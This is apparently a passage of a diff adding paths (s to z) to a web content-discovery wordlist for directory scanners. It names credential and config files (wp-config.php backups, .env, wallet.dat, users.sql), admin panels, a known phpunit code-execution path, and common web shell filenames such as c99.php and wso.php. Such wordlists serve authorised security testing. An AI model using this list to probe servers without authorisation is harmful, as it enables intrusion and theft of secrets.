+system/error.txt
+system/expressionengine/config/config.php
+system/expressionengine/config/database.php
+system/log/
+system/logs/
+system/storage/
+system_administration/
+SystemErr.log
+SystemOut.log
+t00.php
+tags
+tar
+tar.bz2
+tar.gz
+tar.php
+target
+target/
+tasks/
+tconn.conf
+team/
+technico.txt
+telephone
+telphin.log
+temp-testng-customsuite.xml
+temp.php
+temp.sql
+TEMP/
+temp/
+template/
+templates/
+templates/beez/index.php
+templates/beez3/
+templates/index.html
+templates/ja-helio-farsi/index.php
+templates/protostar/
+templates/rhuk_milkyway/index.php
+templates/system/
+templates_c/
+teraform/
+test
+test-build/
+test-driver
+test-output/
+test-report/
+test-result
+test.asp
+test.aspx
+test.chm
+test.htm
+test.html
+test.jsp
+test.mdb
+test.php
+test.sqlite
+test.txt
+test/
+test/php/test.html
+test/reports
+test/ssi/test.shtml
+test/tmp/
+test/version_tmp/
+test0.php
+test1
+test1.php
+test123.php
+test2
+test2.php
+test3.php
+test4.php
+test5.php
+test6.php
+test7.php
+test8.php
+test9.php
+test_
+test_gen
+test_gen.caches
+test_ip.php
+testfile.php
+Testing
+testproxy.php
+TestResult.xml
+tests
+tests/
+tests/phpunit_report.xml
+texinfo.tex
+textpattern/
+themes
+themes/
+themes/default/htdocs/flash/ZeroClipboard.swf
+Thorfile
+threaddump
+Thumbs.db
+thumbs.db
+thumbs/
+tikiwiki
+timeline.xctimeline
+tiny_mce/
+tiny_mce/plugins/filemanager/examples.html
+tiny_mce/plugins/imagemanager/pages/im/index.html
+tinyfilemanager-2.0.1/
+tinyfilemanager-2.0.2/
+tinyfilemanager-2.2.0/
+tinyfilemanager-2.3/
+tinyfilemanager.php
+tinyfilemanager/
+tinymce
+tinymce/
+TMP
+tmp
+tmp.php
+tmp/
+tmp/2.php
+tmp/access.log
+tmp/access_log
+tmp/admin.php
+tmp/cache/models/
+tmp/cache/persistent/
+tmp/cache/views/
+tmp/cgi.pl
+tmp/Cgishell.pl
+tmp/changeall.php
+tmp/cpn.php
+tmp/d.php
+tmp/d0maine.php
+tmp/domaine.php
+tmp/domaine.pl
+tmp/dz.php
+tmp/dz1.php
+tmp/error.log
+tmp/error_log
+tmp/index.php
+tmp/killer.php
+tmp/L3b.php
+tmp/madspotshell.php
+tmp/nanoc/
+tmp/priv8.php
+tmp/root.php
+tmp/sessions/
+tmp/sql.php
+tmp/Sym.php
+tmp/tests/
+tmp/up.php
+tmp/upload.php
+tmp/uploads.php
+tmp/user.php
+tmp/vaga.php
+tmp/whmcs.php
+tmp/xd.php
+TODO
+token.json
+tokenlite.zip
+tomcat-docs/appdev/sample/web/hello.jsp
+tomcat/axis/
+tools
+tools.php
+tools/
+tools/_backups/
+tools/phpMyAdmin/index.php
+trace
+Trace.axd
+Trace.axd::$DATA
+trace.json
+translate.sql
+transmission/web/
+tresearch/
+tresearch/happyaxis.jsp
+tripwire/
+trivia/
+tsconfig.json
+tst
+twitter/.env
+txt/
+typings/
+typo3
+typo3/
+typo3/phpmyadmin/
+typo3/phpmyadmin/index.php
+typo3/phpmyadmin/scripts/setup.php
+typo3_src
+typo3conf/AdditionalConfiguration.php
+typo3conf/temp_fieldInfo.php
+typo3temp/
+uber/
+uber/phpMemcachedAdmin/
+uber/phpMyAdmin/
+uber/phpMyAdminBackup/
+ucwa/
+uddi
+uddiexplorer
+ui
+ui/
+unattend.txt
+unifiedmessaging/
+up.php
+update
+update.php
+UPDATE.txt
+updates
+upfile.php
+UPGRADE
+upgrade.php
+upgrade.readme
+UPGRADE.txt
+UpgradeLog.XML
+upguard/
+upl.php
+Upload
+upload
+upload.asp
+upload.aspx
+upload.cfm
+upload.htm
+upload.html
+upload.php
+upload.php3
+upload.shtm
+upload.zip
+upload/
+upload/1.php
+upload/2.php
+upload/b_user.csv
+upload/b_user.xls
+upload/loginIxje.php
+upload/test.php
+upload/test.txt
+upload/upload.php
+upload2.php
+upload_backup/
+upload_file.php
+uploaded/
+uploader.php
+uploader/
+uploadfile.asp
+uploadfile.php
+uploadfiles.php
+uploadify.php
+uploadify/
+uploads.php
+uploads.zip
+uploads/
+uploads/dump.sql
+upstream_conf
+ur-admin
+ur-admin.php
+ur-admin/
+usage/
+user
+user.asp
+user.html
+user.php
+user.txt
+user/
+user/admin
+user/admin.php
+user_guide
+user_guide_src/build/
+user_guide_src/cilexer/build/
+user_guide_src/cilexer/dist/
+user_guide_src/cilexer/pycilexer.egg-info/
+user_uploads
+useradmin
+useradmin/
+userdb
+UserFile
+UserFiles
+userfiles
+userlogin
+userlogin.php
+UserLogin/
+usernames.txt
+users
+users.csv
+users.db
+users.ini
+users.json
+users.log
+users.mdb
+users.php
+users.sql
+users.sql.gz
+users.sqlite
+users.txt
+users.xls
+users/
+users/admin
+users/admin.php
+usr/
+usuario/
+usuarios/
+usuarios/login.php
+utility_login/
+uvpanel/
+uwsgi.ini
+v1
+v1.0
+v1.1
+v1.zip
+v1/
+v1/graphiql
+v1/graphql
+v1/playground
+v1/public/yql
+v1/test/js/console.html
+v1/test/js/console_ajax.js
+v2
+v2.0
+v2.zip
+v2/
+v2/_catalog
+v2/graphiql
+v2/graphql
+v2/keys/?recursive=true
+v2/playground
+v3
+v3/graphiql
+v3/graphql
+v3/playground
+vadmind/
+vagrant-spec.config.rb
+vagrant/
+Vagrantfile
+Vagrantfile.backup
+validator.php
+var/
+var/backups/
+var/bootstrap.php.cache
+var/cache/
+var/log
+var/log/
+var/log/authorizenet.log
+var/log/exception.log
+var/log/librepag.log
+var/log/old
+var/log/payment.log
+var/log/payment_authorizenet.log
+var/log/payment_paypal_express.log
+var/logs/
+var/package/
+var/sessions/
+variant/
+vault/
+vb.rar
+vb.sql
+vb.zip
+vendor/
+vendor/assets/bower_components
+vendor/bundle
+vendor/composer/installed.json
+vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
+vendors/
+venv.bak/
+venv/
+version
+VERSION.txt
+version.txt
+version/
+video-js.swf
+view-source
+view.php
+views
+vignettes/
+violations/
+vm
+vmailadmin/
+vorod
+vorod.php
+vorod/
+vorud
+vorud.php
+vorud/
+vpn/
+vqmod/checked.cache
+vqmod/logs/
+vqmod/mods.cache
+vqmod/vqcache/
+vtiger/
+vtigercrm/
+vtund.conf
+w.php
+wallet.dat
+wallet.json
+war/gwt_bree/
+war/WEB-INF/classes/
+war/WEB-INF/deploy/
+wc.php
+wcx_ftp.ini
+web-app/plugins
+web-app/WEB-INF/classes
+web-console/
+web-console/Invoker
+web-console/ServerInfo.jsp
+web-console/status?full=true
+WEB-INF./
+WEB-INF./web.xml
+WEB-INF/
+WEB-INF/config.xml
+WEB-INF/lib/_wl_cls_gen.jar
+WEB-INF/web.xml
+web-variables.env
+web.7z
+web.config
+web.config.bak
+web.config.bakup
+web.config.old
+web.config.temp
+web.config.tmp
+web.config.txt
+web.config::$DATA
+web.Debug.config
+web.rar
+web.Release.config
+web.sql
+web.tar
+web.tar.bz2
+web.tar.gz
+web.tgz
+web.xml
+web.zip
+web/
+web/bundles/
+web/phpMyAdmin/
+web/phpMyAdmin/index.php
+web/phpMyAdmin/scripts/setup.php
+web/scripts/setup.php
+web/uploads/
+webadmin
+webadmin.html
+webadmin.php
+webadmin/
+webadmin/admin.html
+webadmin/admin.php
+webadmin/index.html
+webadmin/index.php
+webadmin/login.html
+webadmin/login.php
+webalizer
+webapp/wm/runtime.jsp
+webdav.password
+webdav/
+webdav/index.html
+webdav/servlet/webdav/
+webdb/
+webgrind
+weblogs
+webmail/
+webmail/src/configtest.php
+webmaster
+webmaster.php
+webmaster/
+webmin/
+webpack.config.js
+webpack.mix.js
+website.git
+website.tar
+website.tar.bz2
+website.tar.gz
+website.zip
+websql/
+webstat
+webstat/
+webstats
+webstats.html
+webstats/
+webticket/
+webticket/webticketservice.svc
+weixiao.php
+well-known.zip
+wenzhang
+wget-log
+wheels/
+whmcs.php
+whmcs/
+whmcs/downloads/dz.php
+wiki/
+winscp.ini
+WinSCP.ini
+wizmysqladmin/
+wordpress.tar
+wordpress.tar.bz2
+wordpress.tar.gz
+wordpress.zip
+wordpress/
+wordpress/wp-login.php
+workspace.xml
+workspace/uploads/
+wp-admin/
+wp-admin/c99.php
+wp-admin/install.php
+wp-admin/setup-config.php
+wp-app.log
+wp-cli.yml
+wp-config-sample.php
+wp-config.inc
+wp-config.old
+wp-config.php
+wp-config.php.bak
+wp-config.php.dist
+wp-config.php.inc
+wp-config.php.old
+wp-config.php.save
+wp-config.php.swp
+wp-config.php.txt
+wp-config.php.zip
+wp-config.php~
+wp-content/
+wp-content/backup-db/
+wp-content/backups/
+wp-content/blogs.dir/
+wp-content/cache/
+wp-content/debug.log
+wp-content/mu-plugins/
+wp-content/plugins/adminer/inc/editor/index.php
+wp-content/plugins/count-per-day/js/yc/d00.php
+wp-content/plugins/hello.php
+wp-content/upgrade/
+wp-content/uploads/
+wp-content/uploads/dump.sql
+wp-content/uploads/file-manager/log.txt
+wp-includes/
+wp-includes/rss-functions.php
+wp-json/
+wp-json/wp/v2/users/
+wp-login.php
+wp-login/
+wp-register.php
+wp.php
+wp.rar/
+wp.zip
+wp/
+wp/wp-login.php
+wpad.dat
+ws.php
+WS_FTP.ini
+ws_ftp.ini
+WS_FTP.INI
+WS_FTP.LOG
+WS_FTP/
+WS_FTP/Sites/ws_ftp.ini
+wsadmin.traceout
+wsadmin.valout
+wsadminListener.out
+wshell.php
+wsman
+WSO.php
+wso.php
+wso2.5.1.php
+wso2.php
+wssgs/
+wssgs/happyaxis.jsp
+wstats
+wuwu11.php
+wvdial.conf
+www-error.log
+www-test/
+www.rar
+www.sql
+www.tar
+www.tar.bz2
+www.tar.gz
+www.tgz
+www.zip
+www/phpMyAdmin/index.php
+wwwboard/
+wwwboard/passwd.txt
+wwwlog
+wwwroot.7z
+wwwroot.rar
+wwwroot.sql
+wwwroot.tar
+wwwroot.tar.bz2
+wwwroot.tar.gz
+wwwroot.tgz
+wwwroot.zip
+wwwstat
+wwwstats.htm
+x.php
+xampp/
+xampp/phpmyadmin/
+xampp/phpmyadmin/index.php
+xampp/phpmyadmin/scripts/setup.php
+xcuserdata/
+xd.php
+xferlog
+xiaoma.php
+xlogin/
+xls/
+xml/
+xml/_common.xml
+xml/common.xml
+xmlrpc.php
+xmlrpc_server.php
+xphperrors.log
+xphpMyAdmin/
+xprober.php
+xshell.php
+xsl/
+xsl/_common.xsl
+xsl/common.xsl
+xslt/
+xsql/
+xsql/lib/XSQLConfig.xml
+xw.php
+xw1.php
+xx.php
+yaml.log
+yaml_cron.log
+yarn-debug.log
+yarn-error.log
+yarn.lock
+ylwrap
+yonetici
+yonetici.html
+yonetici.php
+yonetim
+yonetim.html
+yonetim.php
+yum.log
+zabbix/
+zebra.conf
+zehir.php
+zeroclipboard.swf
+zf_backend.php
+zimbra/
+zipkin/
+zone-h.php
+~/
+~admin/